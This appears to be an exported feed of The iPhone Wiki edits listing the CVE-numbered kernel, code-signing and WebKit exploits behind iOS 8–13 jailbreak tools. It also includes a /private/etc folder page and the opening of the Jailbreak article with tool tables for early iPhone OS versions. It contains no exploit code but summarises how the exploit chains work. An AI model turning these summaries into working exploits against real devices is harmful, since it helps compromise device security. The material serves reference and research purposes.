== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* tachy0n (lightspeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.5)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/private/etc&amp;diff=106013</id>
		<title>/private/etc</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/private/etc&amp;diff=106013"/>
		<updated>2020-07-22T23:57:12Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Files */ Added that fstab is no longer present in iOS 14&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This folder is specified by the [[wikipedia:Filesystem Hierarchy Standard|FHS]] as a place that &amp;quot;contains configuration files&amp;quot; (i.e. &amp;quot;local file[s] used to control the operation of a program&amp;quot;). Most of the folders here are not present in jailed iOS except for raccoon, asl, and ppp.&lt;br /&gt;
&lt;br /&gt;
== Children ==&lt;br /&gt;
=== Folders ===&lt;br /&gt;
* {{ipfw|alternatives}}&lt;br /&gt;
* {{ipfw|apt}}&lt;br /&gt;
* {{ipfw|asl}}&lt;br /&gt;
* {{ipfw|bluetool}}&lt;br /&gt;
* {{ipfw|default}}&lt;br /&gt;
* {{ipfw|dpkg}}&lt;br /&gt;
* {{ipfw|pam.d}}&lt;br /&gt;
* {{ipfw|ppp}}&lt;br /&gt;
* {{ipfw|profile.d}}&lt;br /&gt;
* {{ipfw|racoon}}&lt;br /&gt;
* {{ipfw|rc.d}} (not present in jailed iOS)&lt;br /&gt;
* {{ipfw|ssl}}&lt;br /&gt;
&lt;br /&gt;
=== Files ===&lt;br /&gt;
* {{ipfw|afp.conf}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|asl.conf}}&lt;br /&gt;
* {{ipfw|fstab|fstab}} (only present in iOS &amp;lt; 14)&lt;br /&gt;
* {{ipfw|group}}&lt;br /&gt;
* {{ipfw|hosts}}&lt;br /&gt;
* {{ipfw|host.equiv}}&lt;br /&gt;
* {{ipfw|launchd.conf}} (see also: [[launchd.conf Untether]]; not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|master.passwd}}&lt;br /&gt;
* {{ipfw|networks}}&lt;br /&gt;
* {{ipfw|notify.conf}}&lt;br /&gt;
* {{ipfw|passwd}}&lt;br /&gt;
* {{ipfw|profile}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|protocols}}&lt;br /&gt;
* {{ipfw|services}}&lt;br /&gt;
* {{ipfw|ttys}}&lt;br /&gt;
&lt;br /&gt;
== Parents ==&lt;br /&gt;
{{parent|private}}&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html#ETCHOSTSPECIFICSYSTEMCONFIGURATION FHS 2.3 on /etc]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak&amp;diff=106012</id>
		<title>Jailbreak</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak&amp;diff=106012"/>
		<updated>2020-07-22T23:54:16Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: Jailbreaks don't touch fstab anymore so I've added that that method is obsolete.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{float toc|right}}&lt;br /&gt;
'''Jailbreak'''ing is the process by which full execute and write access is obtained on all the partitions of iOS, iPadOS, tvOS and watchOS. It used to be done by patching [[/private/etc/fstab]] to mount the System partition as 'read-write'. This is entirely different from an [[unlock]]. Jailbreaking is the first action that must be taken before things like unofficial [[activation]] (hacktivation), and unofficial [[unlock]]ing can be applied.&lt;br /&gt;
&lt;br /&gt;
Older jailbreaks also included modifying the [[AFC]] service (used by [[iTunes]] to access the filesystem) to give full filesystem access from root. This was later updated to create a new service ([[AFC]]2) that allows access to the full filesystem.&lt;br /&gt;
&lt;br /&gt;
Modern jailbreaks now include patching the kernel to get around code signing and other restrictions. These are called [[Kernel Patches]].&lt;br /&gt;
&lt;br /&gt;
'''Note''': The legality of jailbreaking your device varies with each country/region. [[wikipedia:iOS jailbreaking#Legal status|Wikipedia has a summary of legality for some countries]].&lt;br /&gt;
&lt;br /&gt;
== Types of Jailbreaks ==&lt;br /&gt;
When a device is booting, it loads Apple's own [[kernel]] initially, so a jailbroken device must be exploited and have the kernel patched each time it is booted up.&lt;br /&gt;
&lt;br /&gt;
An [[untethered jailbreak|'''untethered''' jailbreak]] uses exploits that are powerful enough to allow the user to turn their device off and back on at will, with the device starting up completely, and the kernel will be patched without the help of a computer – in other words, it will be jailbroken even after each reboot.&lt;br /&gt;
&lt;br /&gt;
However, some jailbreaks are [[tethered jailbreak|'''tethered''']]. A tethered jailbreak is only able to temporarily jailbreak the device during a single boot. If the user turns the device off and then boots it back up without the help of a jailbreak tool, the device will no longer be running a patched kernel, and it may get stuck in a partially started state, such as [[Recovery Mode]]. In order for the device to start completely and with a patched kernel, it must be &amp;quot;re-jailbroken&amp;quot; with a computer (using the &amp;quot;boot tethered&amp;quot; feature of a tool) each time it is turned on. All changes to the files on the device (such as installed package files or edited system files) will persist between reboots, including changes that can only function if the device is jailbroken (such as installed package files).&lt;br /&gt;
&lt;br /&gt;
In more recent years, two other solutions have been created - '''semi-tethered''' and '''semi-''un''tethered'''.&lt;br /&gt;
&lt;br /&gt;
A [[semi-tethered jailbreak|'''semi-tethered''']] solution is one where the device is able to start up on its own, but it will no longer have a patched kernel, and therefore will not be able to run modified code. It will, however, still be usable for normal functions, just like stock iOS. To start with a patched kernel, the user must start the device with the help of the jailbreak tool.&lt;br /&gt;
&lt;br /&gt;
A [[semi-untethered jailbreak|'''semi-''un''tethered''']] jailbreak gives the ability to start the device on it's own. On first boot, the device will not be running a patched kernel. However, rather than having to run a tool from a computer to apply the kernel patches, the user is able to re-jailbreak their device with the help of an app (usually sideloaded using [[Cydia Impactor]]) running on their device. In the case of the iOS 9.2-9.3.3 jailbreak, a Safari-based exploit was available, thereby meaning a website could be used to rejailbreak.&lt;br /&gt;
&lt;br /&gt;
In more detail: Each iOS device has a [[bootchain]] that tries to make sure only trusted/signed code is loaded. A device with a tethered jailbreak is able to boot up with the help of a jailbreaking tool because the tool executes exploits via USB that bypass parts of that &amp;quot;chain of trust&amp;quot;, bootstrapping to a [[pwned]] (no [[Signature Check Patch|signature check]]) [[iBSS]], [[iBEC]], or [[iBoot (Bootloader)|iBoot]] to finish the boot process.&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Tools ==&lt;br /&gt;
Untethered or semi-untethered jailbreaks are shown with a green 'yes'. Tethered or semi-tethered jailbreaks will be stated in a yellow box. [[Beta Firmware]]s are not listed here.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Do NOT use rowspan across different iOS versions. For example, do NOT carry over the rowspan from 3.1 to 3.1.2. --&amp;gt;&lt;br /&gt;
&amp;lt;!-- colspan takes priority over rowspan in most cases --&amp;gt;&lt;br /&gt;
===iPhone OS===&lt;br /&gt;
====1.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iPhone OS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;2&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[M68AP|iPhone]]&lt;br /&gt;
! [[N45AP|iPod touch]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | 1.0&lt;br /&gt;
| [[AppTapp Installer]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[iBrickr]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.5-0.91&lt;br /&gt;
|-&lt;br /&gt;
| [[iLiberty+]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.3.0.113&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | The [[libTiff Exploit]]&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;libtiff&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 1.0.1&lt;br /&gt;
| [[AppTapp Installer]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[iBrickr]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.5-0.91&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | The [[libTiff Exploit]]&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;libtiff&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 1.0.2&lt;br /&gt;
| [[AppTapp Installer]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[iBrickr]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 0.6-0.91&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | The [[libTiff Exploit]]&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;libtiff&amp;quot; /&amp;gt;&lt;br /&gt;
|-	&lt;br /&gt;
| 1.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | The [[libTiff Exploit]]&lt;br /&gt;
| {{n/a}}&lt;br /&gt;
| {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;libtiff&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| 1.1.1&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | The [[libTiff Exploit]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;libtiff&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| 1.1.2&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[mknod|OktoPrep]] + [[touchFree]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;oktoprep-offline&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; rowspan=&amp;quot;3&amp;quot; | 1.1.3&lt;br /&gt;
| [[iLiberty+|iLiberty / iLiberty+]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.3.0.113&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; | [[Soft Upgrade]]&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{partial|Yes}}&amp;lt;ref group=&amp;quot;1.x&amp;quot; name=&amp;quot;softupgrade-offline&amp;quot; /&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [[ZiPhone]]&lt;br /&gt;
| 3.0&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 1.1.4&lt;br /&gt;
| [[iLiberty+|iLiberty / iLiberty+]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.3.0.113&lt;br /&gt;
| colspan=&amp;quot;2&amp;quot; rowspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.1&lt;br /&gt;
|-&lt;br /&gt;
| [[ZiPhone]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.0&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 1.1.5&lt;br /&gt;
| [[iLiberty+|iLiberty / iLiberty+]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 1.3.0.113&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| [[ZiPhone]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 3.0&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;references group=&amp;quot;1.x&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;libtiff&amp;quot;&amp;gt;A maliciously-crafted TIFF, using the [[libTiff Exploit]], loaded into Safari, can be used to jailbreak iPhone OS 1.0-1.1.1. There are several of these TIFFs available - two of the most notable include [https://forums.macrumors.com/threads/377126/ planetbeing's] and [[AppSnapp]]. However, both of these services are now offline, so cannot be used. Even so, a user could still create their own TIFF and payload in order to jailbreak 1.1.1, such as by following [https://mtmdev.org/blog/mtm-devadmin/2018/ios-1-1-1-jailbreak this guide].&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;oktoprep-offline&amp;quot;&amp;gt;It was previously possible to jailbreak 1.1.2 using [[mknod|OktoPrep]] alongside [[touchFree]]. However, the original package repository for OktoPrep through [[Installer.app]] has been taken offline. A user would need to find the original package file for OktoPrep and install it manually in order to jailbreak 1.1.2.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;ref name=&amp;quot;softupgrade-offline&amp;quot;&amp;gt;It was previously possible to jailbreak 1.1.3 using [[Soft Upgrade]], but this is no longer possible due to the package repository being taken offline. A user would need to find the original package file for Soft Upgrade and install it manually to jailbreak 1.1.3 using this method.&amp;lt;/ref&amp;gt;&lt;br /&gt;
&amp;lt;/references&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====2.x====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | iPhone OS&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Jailbreak Tool&lt;br /&gt;
! rowspan=&amp;quot;2&amp;quot; | Tool Version&lt;br /&gt;
! colspan=&amp;quot;4&amp;quot; | Device&lt;br /&gt;
|-&lt;br /&gt;
! [[M68AP|iPhone]]&lt;br /&gt;
! [[N82AP|iPhone 3G]]&lt;br /&gt;
! [[N45AP|iPod touch]]&lt;br /&gt;
! [[N72AP|iPod touch (2nd generation)]]&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 2.0&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.0-2.0.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[QuickPwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC3-2.2.5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 2.0.1&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.0.2-2.0.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[QuickPwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC3-2.2.5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 2.0.2&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.0.3&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[QuickPwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | RC3-2.2.5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 2.1&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.1-2.2.5&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; {{n/a}}&lt;br /&gt;
|-&lt;br /&gt;
| [[QuickPwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.1-2.2.5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
|-&lt;br /&gt;
| 2.1.1&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; colspan=&amp;quot;2&amp;quot; | [[redsn0w Lite]]&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{n/a}}&lt;br /&gt;
| {{partial|Tethered}}&amp;lt;ref group=&amp;quot;2.x&amp;quot;&amp;gt;Tethered for devices running the [[Bootrom 240.4|old bootrom]] only. Will not work for devices on the [[Bootrom 240.5.1|new bootrom]] ([[Bootrom 240.5.1|new bootrom]] devices cannot run iPhoneOS 2, only 3).&amp;lt;/ref&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | 2.2&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2-2.2.5&lt;br /&gt;
| colspan=&amp;quot;3&amp;quot; {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| [[QuickPwn]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2-2.2.5&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
| {{yes}}&lt;br /&gt;
| {{no}}&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | 2.2.1&lt;br /&gt;
| [[PwnageTool]]&lt;br /&gt;
| class=&amp;quot;rborderplz&amp;quot; | 2.2.1-2.2.5&lt;br /&gt;
